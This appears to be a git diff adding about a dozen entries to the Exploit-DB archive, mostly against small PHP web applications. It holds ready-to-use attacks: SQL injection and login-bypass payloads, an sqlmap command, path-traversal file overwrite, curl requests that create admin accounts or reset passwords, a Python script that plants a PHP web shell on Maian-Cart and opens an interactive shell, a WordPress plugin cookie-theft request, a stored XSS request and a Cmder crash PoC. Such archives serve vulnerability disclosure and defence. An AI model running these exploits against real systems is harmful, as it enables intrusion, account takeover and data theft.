diff --git a/exploits/php/webapps/50391.txt b/exploits/php/webapps/50391.txt new file mode 100644 index 000000000..e22f2b4f3 --- /dev/null +++ b/exploits/php/webapps/50391.txt @@ -0,0 +1,40 @@ +# Title: IFSC Code Finder Project 1.0 - SQL injection (Unauthenticated) +# Exploit Author: Yash Mahajan +# Date: 2021-10-07 +# Vendor Homepage: https://phpgurukul.com/ifsc-code-finder-project-using-php/ +# Version: 1 +# Software Link: https://phpgurukul.com/?smd_process_download=1&download_id=14478 +# Tested On: Windows 10, XAMPP +# Vulnerable Parameter: searchifsccode + +Steps to Reproduce: + +1) Navigate to http://127.0.0.1/ifscfinder/ enter any number in search field and capture request in burpsuite. +2) Paste below request into burp repeater and also create a txt file and paste this request. + +Request: +======== +POST /ifscfinder/search.php HTTP/1.1 +Host: 127.0.0.1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 79 +Origin: http://127.0.0.1 +Connection: close +Referer: http://127.0.0.1/ifscfinder/ +Cookie: PHPSESSID=5877lg2kv4vm0n5sb8e1eb0d0k +Upgrade-Insecure-Requests: 1 +Sec-Fetch-Dest: document +Sec-Fetch-Mode: navigate +Sec-Fetch-Site: same-origin +Sec-Fetch-User: ?1 + +searchifsccode=')+AND+(SELECT+3757+FROM+(SELECT(SLEEP(20)))lygy)--+fvnT&search= + +-------------------------------------------------------------------------------- +3) You will see a time delay of 20 Sec in response. +4) python sqlmap.py -r request.txt -p searchifsccode --dbs +5) We can retrieve all databases using above sqlmap command \ No newline at end of file diff --git a/exploits/php/webapps/50392.txt b/exploits/php/webapps/50392.txt new file mode 100644 index 000000000..b9e25e41e --- /dev/null +++ b/exploits/php/webapps/50392.txt @@ -0,0 +1,295 @@ +# Exploit Title: Online Traffic Offense Management System 1.0 - Privilage escalation (Unauthenticated) +# Date: 07/10/2021 +# Exploit Author: Hubert Wojciechowski +# Contact Author: snup.php@gmail.com +# Vendor Homepage: https://www.sourcecodester.com +# Software Link: https://www.sourcecodester.com/php/14909/online-traffic-offense-management-system-php-free-source-code.html +# Version: 1.0 +# Testeted on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 + +### Privilage escalation + +# All requests can be sent by both an authenticated and a non-authenticated user + +# The vulnerabilities in the application allow for: + +* Reading any PHP file from the server +* Saving files to parent and child directories and overwriting files in server +* Performing operations by an unauthenticated user with application administrator rights + +----------------------------------------------------------------------------------------------------------------------- +# POC +----------------------------------------------------------------------------------------------------------------------- + +## Example 1 - Reading any PHP file from the server + +Example vuln scripts: +http://localhost/traffic_offense/index.php?p= +http://localhost/traffic_offense/admin/?page= + +# Request reading rrr.php file from other user in serwer + +GET /traffic_offense/index.php?p=../phpwcms2/rrr HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +Connection: close + +----------------------------------------------------------------------------------------------------------------------- +# Response + +HTTP/1.1 200 OK +Date: Thu, 07 Oct 2021 10:09:35 GMT +Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 +X-Powered-By: PHP/7.4.23 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Access-Control-Allow-Origin: * +Connection: close +[...] +

Hacked file other user in serwer!

+[...] + +----------------------------------------------------------------------------------------------------------------------- + +## Example 2 - Saving files to parent and child directories and overwriting files in server + +# Request to read file + +GET /traffic_offense/index.php HTTP/1.1 +Host: localhost +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +Connection: close + +----------------------------------------------------------------------------------------------------------------------- +# Response + +HTTP/1.1 200 OK +Date: Thu, 07 Oct 2021 10:30:56 GMT +Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 +X-Powered-By: PHP/7.4.23 +Set-Cookie: PHPSESSID=330s5p4flpokvjpl4nvfp4dj2t; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Access-Control-Allow-Origin: * +Connection: close +Content-Type: text/html; charset=UTF-8 +Content-Length: 15095 + + + + + + + Online Traffic Offense Management System - PHP +[...] + +----------------------------------------------------------------------------------------------------------------------- +# Request to overwrite file index.php in main directory webapp + +POST /traffic_offense/classes/Master.php?f=save_driver HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------329606699635951312463334027403 +Content-Length: 1928 +Origin: http://localhost +Connection: close +Referer: http://localhost/traffic_offense/admin/?page=drivers/manage_driver&id=4 +Cookie: PHPSESSID=2nkvkfftfjckjeqfkt6917vnu7 +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="id" + +5/../../../index +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="license_id_no" + +GBN-1020061 +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="lastname" + +Blake +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="firstname" + +Claire +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="middlename" + +C +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="dob" + +1992-10-12 +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="present_address" + +Sample Addss 123 +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="permanent_address" + +Sample Addess 123 +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="civil_status" + +Married +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="nationality" + +Filipino +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="contact" + +09121789456 +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="license_type" + +Non-Professional +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="image_path" + +uploads/drivers/ +-----------------------------329606699635951312463334027403 +Content-Disposition: form-data; name="img"; filename="fuzzdb.php" +Content-Type: image/png + + +-----------------------------329606699635951312463334027403-- + +# New file have extention as this write filename="fuzzdb.php" +# New file have name and locate 5/../../../index we can save file in other directory ;) +# Line must start digit +# We can rewrite config files + +----------------------------------------------------------------------------------------------------------------------- +# Respopnse + +HTTP/1.1 200 OK +Date: Thu, 07 Oct 2021 10:38:35 GMT +Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 +X-Powered-By: PHP/7.4.23 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Access-Control-Allow-Origin: * +Content-Length: 20 +Connection: close +Content-Type: text/html; charset=UTF-8 + +{"status":"success"} + +----------------------------------------------------------------------------------------------------------------------- +# Request to read file index.php again + +GET /traffic_offense/index.php HTTP/1.1 +Host: localhost +Accept-Encoding: gzip, deflate +Accept: */* +Accept-Language: en +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +Connection: close + +----------------------------------------------------------------------------------------------------------------------- +# Response + +HTTP/1.1 200 OK +Date: Thu, 07 Oct 2021 10:42:17 GMT +Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 +X-Powered-By: PHP/7.4.23 +Access-Control-Allow-Origin: * +Content-Length: 42 +Connection: close +Content-Type: text/html; charset=UTF-8 + +Hacked other client files in this hosting! + +----------------------------------------------------------------------------------------------------------------------- +## Example 4 - Performing operations by an unauthenticated user with application administrator rights + +# The application allows you to perform many operations without authorization, the application has no permission matrix. The entire application is vulnerable +# Request adding new admin user to application by sending a request by an authorized user + +POST /traffic_offense/classes/Users.php?f=save HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 +Accept: */* +Accept-Language: pl,en-US;q=0.7,en;q=0.3 +Accept-Encoding: gzip, deflate +X-Requested-With: XMLHttpRequest +Content-Type: multipart/form-data; boundary=---------------------------210106920639395210803657370685 +Content-Length: 949 +Origin: http://localhost +Connection: close +Sec-Fetch-Dest: empty +Sec-Fetch-Mode: cors +Sec-Fetch-Site: same-origin + +-----------------------------210106920639395210803657370685 +Content-Disposition: form-data; name="id" + +21 +-----------------------------210106920639395210803657370685 +Content-Disposition: form-data; name="firstname" + +hack +-----------------------------210106920639395210803657370685 +Content-Disposition: form-data; name="lastname" + +hack +-----------------------------210106920639395210803657370685 +Content-Disposition: form-data; name="username" + +hack +-----------------------------210106920639395210803657370685 +Content-Disposition: form-data; name="password" + +hack +-----------------------------210106920639395210803657370685 +Content-Disposition: form-data; name="type" + +1 +-----------------------------210106920639395210803657370685 +Content-Disposition: form-data; name="img"; filename="aaa.php" +Content-Type: application/octet-stream + + + +-----------------------------210106920639395210803657370685-- + +----------------------------------------------------------------------------------------------------------------------- +# Response + +HTTP/1.1 200 OK +Date: Thu, 07 Oct 2021 10:50:36 GMT +Server: Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23 +X-Powered-By: PHP/7.4.23 +Set-Cookie: PHPSESSID=2l1p4103dtj3j3vrod0t6rk6pn; path=/ +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Access-Control-Allow-Origin: * +Content-Length: 1 +Connection: close +Content-Type: text/html; charset=UTF-8 + +1 + +# The request worked fine, log into the app using your hack account \ No newline at end of file diff --git a/exploits/php/webapps/50394.py b/exploits/php/webapps/50394.py new file mode 100755 index 000000000..f30148fad --- /dev/null +++ b/exploits/php/webapps/50394.py @@ -0,0 +1,120 @@ +# Exploit title: Maian-Cart 3.8 - Remote Code Execution (RCE) (Unauthenticated) +# Date: 27.11.2020 19:35 +# Tested on: Ubuntu 20.04 LTS +# Exploit Author(s): DreyAnd, purpl3 +# Software Link: https://www.maiancart.com/download.html +# Vendor homepage: https://www.maianscriptworld.co.uk/ +# Version: Maian Cart 3.8 +# CVE: CVE-2021-32172 + +#!/usr/bin/python3 + +import argparse +import requests +from bs4 import BeautifulSoup +import sys +import json +import time + +parser = argparse.ArgumentParser() +parser.add_argument("host", help="Host to exploit (with http/https prefix)") +parser.add_argument("dir", help="default=/ , starting directory of the +maian-cart instance, sometimes is placed at /cart or /maiancart") +args = parser.parse_args() + +#args + +host = sys.argv[1] +directory = sys.argv[2] + +#CREATE THE FILE + +print("\033[95mCreating the file to write payload to...\n\033[00m", flush=True) +time.sleep(1) + +try: + r = requests.get(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=mkfile&name=shell.php&target=l1_Lw") + print(r.text) + if "added" in r.text: + print("\033[95mFile successfully created.\n\033[00m") + else: + print("\033[91mSome error occured.\033[00m") + +except (requests.exceptions.RequestException): + print("\033[91mThere was a connection issue. Check if you're +connected to wifi or if the host is correct\033[00m") + +#GET THE FILE ID + +time.sleep(1) + +file_response = r.text +soup = BeautifulSoup(file_response,'html.parser') +site_json=json.loads(soup.text) +hash_id = [h.get('hash') for h in site_json['added']] +file_id = str(hash_id).replace("['", "").replace("']", "") + + +print("\033[95mGot the file id: ", "\033[91m", file_id , "\033[00m") +print("\n") + +#WRITE TO THE FILE + +print("\033[95mWritting the payload to the file...\033[00m") +print("\n") +time.sleep(1) + +headers = { + "Accept": "application/json, text/javascript, /; q=0.01", + "Accept-Language" : "en-US,en;q=0.5", + "Content-Type" : "application/x-www-form-urlencoded; charset=UTF-8", + "X-Requested-With" : "XMLHttpRequest", + "Connection" : "keep-alive", + "Pragma" : "no-cache", + "Cache-Control" : "no-cache", +} + +data = f"cmd=put&target={file_id}&content=%3C%3Fphp%20system%28%24_GET%5B%22cmd%22%5D%29%20%3F%3E" + +try: + write = requests.post(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder", +headers=headers, data=data) + print(write.text) +except (requests.exceptions.RequestException): + print("\033[91mThere was a connection issue. Check if you're +connected to wifi or if the host is correct\033[00m") + + +#EXECUTE THE PAYLOAD + +print("\033[95mExecuting the payload...\033[00m") +print("\n") +time.sleep(1) + +exec_host = f"{host}{directory}/product-downloads/shell.php" + +print(f"\033[92mGetting a shell. To stop it, press CTRL + C. Browser +url: {host}{directory}/product-downloads/shell.php?cmd=\033[00m") +time.sleep(2) + +while True: + def main(): + execute = str(input("$ ")) + e = requests.get(f"{exec_host}?cmd={execute}") + print(e.text) + + try: + if __name__ == "__main__": + main() + except: + exit = str(input("Do you really wish to exit? Y/N? ")) + + if exit == "Y" or exit =="y": + print("\033[91mExit detected. Removing the shell...\033[00m") + remove = +requests.get(f"{host}{directory}/admin/index.php?p=ajax-ops&op=elfinder&cmd=rm&targets%5B%5D={file_id}") + print("\033[91m" , remove.text, "\033[00m") + print("\033[91mBye!\033[00m") + sys.exit(1) + else: + main() \ No newline at end of file diff --git a/exploits/php/webapps/50395.txt b/exploits/php/webapps/50395.txt new file mode 100644 index 000000000..3e584392e --- /dev/null +++ b/exploits/php/webapps/50395.txt @@ -0,0 +1,12 @@ +# Exploit Title: WordPress Plugin Pie Register 3.7.1.4 - Admin Privilege Escalation (Unauthenticated) +# Google Dork: inurl:/plugins/pie-register/ +# Date: 08.10.2021 +# Exploit Author: Lotfi13-DZ +# Vendor Homepage: https://wordpress.org/plugins/pie-register/ +# Software Link: https://downloads.wordpress.org/plugin/pie-register.3.7.1.4.zip +# Version: <= 3.7.1.4 +# Tested on: ubuntu + +Vulnerable arg: [user_id_social_site=1] <== will return the authentications cookies for user 1 (admin). + +Exploit: wget -q -S -O - http://localhost/ --post-data 'user_id_social_site=1&social_site=true&piereg_login_after_registration=true&_wp_http_referer=/login/&log=null&pwd=null' > /dev/null \ No newline at end of file diff --git a/exploits/php/webapps/50396.txt b/exploits/php/webapps/50396.txt new file mode 100644 index 000000000..c0d4e55b0 --- /dev/null +++ b/exploits/php/webapps/50396.txt @@ -0,0 +1,20 @@ +# Exploit Title: Simple Online College Entrance Exam System 1.0 - Unauthenticated Admin Creation +# Date: 07.10.2021 +# Exploit Author: Amine ismail @aminei_ +# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code +# Version: 1.0 +# Tested on: Windows 10, Kali Linux +# Unauthenticated admin creation + +Unauthenticated admin creation: + + Request: + POST /entrance_exam/Actions.php?a=save_admin HTTP/1.1 + Host: 127.0.0.1 + Content-Length: 42 + + id=&fullname=admin2&username=admin2&type=1 + + PoC to create an admin user named exploitdb and password exploitdb: + curl -d "id=&fullname=admin&username=exploitdb&type=1&password=916b5dbd201b469998d9b4a4c8bc4e08" -X POST 'http://127.0.0.1/entrance_exam/Actions.php?a=save_admin' \ No newline at end of file diff --git a/exploits/php/webapps/50397.txt b/exploits/php/webapps/50397.txt new file mode 100644 index 000000000..7c6afac83 --- /dev/null +++ b/exploits/php/webapps/50397.txt @@ -0,0 +1,39 @@ +# Exploit Title: Simple Online College Entrance Exam System 1.0 - Account Takeover +# Date: 07.10.2021 +# Exploit Author: Amine ismail @aminei_ +# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code +# Version: 1.0 +# Tested on: Windows 10, Kali Linux +# Unauthenticated password change leading to account takeover + +Explanation: By setting the parameter old_password as array, the MD5 function on it returns null, so md5($old_password) == $_SESSION['password'] since we have no session, thus bypassing the check, after that we can use SQLI and inject our custom data. + + Request: + POST /entrance_exam/Actions.php?a=update_credentials HTTP/1.1 + Content-Type: application/x-www-form-urlencoded; charset=UTF-8 + Content-Length: 129 + + id=4&username=test',`password`='916b5dbd201b469998d9b4a4c8bc4e08'+WHERE+admin_id=4;%23&password=commented_out&old_password[]=test + + Vulnerable code in Actions.php: + function update_credentials(){ + extract($_POST); + $data = ""; + foreach($_POST as $k => $v){ + if(!in_array($k,array('id','old_password')) && !empty($v)){ + if(!empty($data)) $data .= ","; + if($k == 'password') $v = md5($v); + $data .= " `{$k}` = '{$v}' "; + } + } + ... + if(!empty($password) && md5($old_password) != $_SESSION['password']){ + $resp['status'] = 'failed'; + $resp['msg'] = "Old password is incorrect."; + }else{ + $sql = "UPDATE `admin_list` set {$data} where admin_id = '{$_SESSION['admin_id']}'"; + @$save = $this->query($sql); + + PoC that changes the password and username of user 'admin' to 'exploitdb': + curl -d "username=exploitdb',%60password%60='916b5dbd201b469998d9b4a4c8bc4e08' WHERE admin_id=1;%23&password=useless&old_password[]=useless" -X POST 'http://127.0.0.1/entrance_exam/Actions.php?a=update_credentials' \ No newline at end of file diff --git a/exploits/php/webapps/50398.txt b/exploits/php/webapps/50398.txt new file mode 100644 index 000000000..a1d733e54 --- /dev/null +++ b/exploits/php/webapps/50398.txt @@ -0,0 +1,16 @@ +# Exploit Title: Simple Online College Entrance Exam System 1.0 - 'Multiple' SQL injection +# Date: 07.10.2021 +# Exploit Author: Amine ismail @aminei_ +# Vendor Homepage: https://www.sourcecodester.com/php/14976/simple-online-college-entrance-exam-system-php-and-sqlite-free-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14976&title=Simple+Online+College+Entrance+Exam+System+in+PHP+and+SQLite+Free+Source+Code +# Version: 1.0 +# Tested on: Windows 10, Kali Linux +# Multiple SQL injections + +The following PoCs will leak the admin username and password: + +Unauthenticated: + http://127.0.0.1/entrance_exam/take_exam.php?id=%27+UNION+SELECT+1,username||%27;%27||password,3,4,5,6,7+FROM+admin_list; + +Admin: + http://127.0.0.1/entrance_exam/admin/view_enrollee.php?id=1'+UNION+SELECT+1,2,3,4,5,6,password,username,9,10,11,12,13,14,15+FROM+admin_list; \ No newline at end of file diff --git a/exploits/php/webapps/50399.txt b/exploits/php/webapps/50399.txt new file mode 100644 index 000000000..3e00bd2d2 --- /dev/null +++ b/exploits/php/webapps/50399.txt @@ -0,0 +1,21 @@ +# Exploit Title: Online Enrollment Management System 1.0 - Authentication Bypass +# Date: 07.10.2021 +# Exploit Author: Amine ismail @aminei_ +# Vendor Homepage: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html +# Software Link: https://www.sourcecodester.com/php/12914/online-enrollment-management-system-paypal-payments-phpmysqli.html +# Version: 1.0 +# Tested on: Windows 10, Kali Linux +# Admin panel authentication bypass + +Admin panel authentication can be bypassed due to a SQL injection in the login form: + +Request: + POST /OnlineEnrolmentSystem/admin/login.php HTTP/1.1 + Host: 127.0.0.1 + Content-Length: 63 + Cookie: PHPSESSID=jd2phsg2f7pvv2kfq3lgfkc98q + + user_email=admin'+OR+1=1+LIMIT+1;--+-&user_pass=admin&btnLogin= + +PoC: + curl -d "user_email=admin' OR 1=1 LIMIT 1;--+-&user_pass=junk&btnLogin=" -X POST http://127.0.0.1/OnlineEnrolmentSystem/admin/login.php \ No newline at end of file diff --git a/exploits/php/webapps/50400.txt b/exploits/php/webapps/50400.txt new file mode 100644 index 000000000..f183b6dd8 --- /dev/null +++ b/exploits/php/webapps/50400.txt @@ -0,0 +1,31 @@ +# Exploit Title: Online Employees Work From Home Attendance System 1.0 - SQLi Authentication Bypass +# Date: 08.10.2021 +# Exploit Author: Merve Oral +# Vendor Homepage: https://www.sourcecodester.com/php/14981/online-employees-work-home-attendance-system-php-and-sqlite-free-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14981&title=Online+Employees+Work+From+Home+Attendance+System+in+PHP+and+SQLite+Free+Source+Code +# Version: 1.0 +# Tested on: Windows 10, Kali Linux +# Online Employees Work From Home Attendance System/Logs in a Web App v1.0 Login page can be bypassed with a simple SQLi to the username parameter. + +Steps To Reproduce: +1 - Go to the login page http://localhost/audit_trail/login.php +2 - Enter the payload to username field as "admin' or '1'='1" without double-quotes and type anything to password field. +3 - Click on "Login" button and you are logged in as administrator. + +PoC + +POST /wfh_attendance/Actions.php?a=login HTTP/1.1 +Host: merve +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: application/json, text/javascript, */*; q=0.01 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 40 +Origin: http://merve +Connection: close +Referer: http://merve/wfh_attendance/admin/login.php +Cookie: PHPSESSID=55nnlgv0kg2qaki92o2s9vl5rq + +username=admin'+or+'1'%3D'1&password=any \ No newline at end of file diff --git a/exploits/php/webapps/50402.txt b/exploits/php/webapps/50402.txt new file mode 100644 index 000000000..6301dac75 --- /dev/null +++ b/exploits/php/webapps/50402.txt @@ -0,0 +1,31 @@ +# Exploit Title: Loan Management System 1.0 - SQLi Authentication Bypass +# Date: 08.10.2021 +# Exploit Author: Merve Oral +# Vendor Homepage: https://www.sourcecodester.com/php/14471/loan-management-system-using-phpmysql-source-code.html +# Software Link: https://www.sourcecodester.com/download-code?nid=14471&title=Loan+Management+System+using+PHP%2FMySQL+with+Source+Code +# Version: 1.0 +# Tested on: Windows 10, Kali Linux +# Loan Management System Login page can be bypassed with a simple SQLi to the username parameter. + +Steps To Reproduce: +1 - Go to the login page http://localhost/audit_trail/login.php +2 - Enter the payload to username field as "admin' or '1'='1'#" without double-quotes and type anything to password field. +3 - Click on "Login" button and you are logged in as administrator. + +PoC + +POST /loan/ajax.php?action=login HTTP/1.1 +Host: merve +User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0 +Accept: */* +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded; charset=UTF-8 +X-Requested-With: XMLHttpRequest +Content-Length: 44 +Origin: http://merve +Connection: close +Referer: http://merve/loan/login.php +Cookie: PHPSESSID=911fclrpoa87v9dsp9lh28ck0h + +username=admin'+or+'1'%3D'1'%23&password=any \ No newline at end of file diff --git a/exploits/python/webapps/50393.txt b/exploits/python/webapps/50393.txt new file mode 100644 index 000000000..ed23e1d02 --- /dev/null +++ b/exploits/python/webapps/50393.txt @@ -0,0 +1,56 @@ +# Exploit Title: django-unicorn 0.35.3 - Stored Cross-Site Scripting (XSS) +# Date: 10/7/21 +# Exploit Author: Raven Security Associates, Inc. (ravensecurity.net) +# Software Link: https://pypi.org/project/django-unicorn/ +# Version: <= 0.35.3 +# CVE: CVE-2021-42053 + +django-unicorn <= 0.35.3 suffers from a stored XSS vulnerability by improperly escaping data from AJAX requests. + +Step 1: Go to www.django-unicorn.com/unicorn/message/todo +Step 2: Enter an xss payload in the todo form (https://portswigger.net/web-security/cross-site-scripting/cheat-sheet). + + +POC: + +POST /unicorn/message/todo HTTP/2 +Host: www.django-unicorn.com +Cookie: csrftoken=EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z +Content-Length: 258 +Sec-Ch-Ua: "";Not A Brand"";v=""99"", ""Chromium"";v=""94"" +Sec-Ch-Ua-Mobile: ?0 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.61 Safari/537.36 +Content-Type: text/plain;charset=UTF-8 +Accept: application/json +X-Requested-With: XMLHttpRequest +X-Csrftoken: EbjPLEv70y1yPrNMdeFg9pH8hNVBgkrepSzuMM9zi6yPviifZKqQ3uIPJ4hsFq3z +Sec-Ch-Ua-Platform: ""Linux"" +Origin: https://www.django-unicorn.com +Sec-Fetch-Site: same-origin +Sec-Fetch-Mode: cors +Sec-Fetch-Dest: empty +Referer: https://www.django-unicorn.com/examples/todo +Accept-Encoding: gzip, deflate +Accept-Language: en-US,en;q=0.9 + +{""id"":""Q43GSmJh"",""data"":{""task"":"""",""tasks"":[]},""checksum"":""4ck2yTwX"",""actionQueue"":[{""type"":""syncInput"",""payload"":{""name"":""task"",""value"":""""}},{""type"":""callMethod"",""payload"":{""name"":""add""},""partial"":{}}],""epoch"":1633578678871} + +----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------- + +HTTP/2 200 OK +Date: Thu, 07 Oct 2021 03:51:18 GMT +Content-Type: application/json +X-Frame-Options: DENY +X-Content-Type-Options: nosniff +Referrer-Policy: same-origin +Via: 1.1 vegur +Cf-Cache-Status: DYNAMIC +Expect-Ct: max-age=604800, report-uri=""https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"" +Report-To: {""endpoints"":[{""url"":""https:\/\/a.nel.cloudflare.com\/report\/v3?s=b4nQavto8LK9ru7JfhbNimKP71ZlMtduJTy6peHCwxDVWBH2Mkn0f7O%2FpWFy1FgPTd6Z6FmfkYUw5Izn59zN6kTQmjNjddiPWhWCWZWwOFiJf45ESQxuxr44UeDv3w51h1Ri6ESnNE5Y""}],""group"":""cf-nel"",""max_age"":604800} +Nel: {""success_fraction"":0,""report_to"":""cf-nel"",""max_age"":604800} +Server: cloudflare +Cf-Ray: 69a42b973f6a6396-ORD +Alt-Svc: h3="":443""; ma=86400, h3-29="":443""; ma=86400, h3-28="":443""; ma=86400, h3-27="":443""; ma=86400 + +{""id"": ""Q43GSmJh"", ""data"": {""tasks"": [""""]}, ""errors"": {}, ""checksum"": ""ZQn54Ct4"", ""dom"": ""
\n
\n\n
\n\n

\n

\n\n

\n
\n"", ""return"": {""method"": ""add"", ""params"": [], ""value"": null}}" +"ENDTEXT" \ No newline at end of file diff --git a/exploits/windows/local/50401.txt b/exploits/windows/local/50401.txt new file mode 100644 index 000000000..533d76c13 --- /dev/null +++ b/exploits/windows/local/50401.txt @@ -0,0 +1,24 @@ +# Exploit Title: Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial-of-Service (PoC) +# Date: 2021-10-07 +# Exploit Author: Aryan Chehreghani +# Vendor Homepage: https://cmder.net +# Software Link: https://github.com/cmderdev/cmder/releases/download/v1.3.18/cmder.zip +# Version: v1.3.18 +# Tested on: Windows 10 + +# [About - Cmder Console Emulator] : + +#Cmder is a software package created over absence of usable console emulator on Windows. +#It is based on ConEmu with major config overhaul, comes with a Monokai color scheme, amazing clink (further enhanced by clink-completions) and a custom prompt layout. + +# [Security Issue] : + +#equires the execution of a .cmd file type and The created file enters the emulator ,That will trigger the buffer overflow condition. +#E.g λ cmder.cmd + +# [POC] : + +PAYLOAD=chr(235) + "\\CMDER" +PAYLOAD = PAYLOAD * 3000 +with open("cmder.cmd", "w") as f: +f.write(PAYLOAD) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index e5b9a8e7e..92625a71f 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -11396,6 +11396,7 @@ id,file,description,date,author,type,platform,port 50336,exploits/windows/local/50336.py,"Cyberfox Web Browser 52.9.1 - Denial-of-Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows, 50337,exploits/windows/local/50337.ps1,"XAMPP 7.4.3 - Local Privilege Escalation",1970-01-01,"Salman Asad",local,windows, 50385,exploits/linux/local/50385.txt,"Google SLO-Generator 2.0.0 - Code Execution",1970-01-01,"Kiran Ghimire",local,linux, +50401,exploits/windows/local/50401.txt,"Cmder Console Emulator 1.3.18 - 'Cmder.exe' Denial-of-Service (PoC)",1970-01-01,"Aryan Chehreghani",local,windows, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",1970-01-01,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",1970-01-01,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",1970-01-01,"Marcin Wolak",remote,windows,139 @@ -44502,3 +44503,14 @@ id,file,description,date,author,type,platform,port 50388,exploits/php/webapps/50388.txt,"Online Traffic Offense Management System 1.0 - Multiple XSS (Unauthenticated)",1970-01-01,snup,webapps,php, 50389,exploits/php/webapps/50389.txt,"Online Traffic Offense Management System 1.0 - Multiple RCE (Unauthenticated)",1970-01-01,snup,webapps,php, 50390,exploits/php/webapps/50390.txt,"Simple Online College Entrance Exam System 1.0 - SQLi Authentication Bypass",1970-01-01,"Mevlüt Yılmaz",webapps,php, +50391,exploits/php/webapps/50391.txt,"IFSC Code Finder Project 1.0 - SQL injection (Unauthenticated)",1970-01-01,"Yash Mahajan",webapps,php, +50392,exploits/php/webapps/50392.txt,"Online Traffic Offense Management System 1.0 - Privilage escalation (Unauthenticated)",1970-01-01,snup,webapps,php, 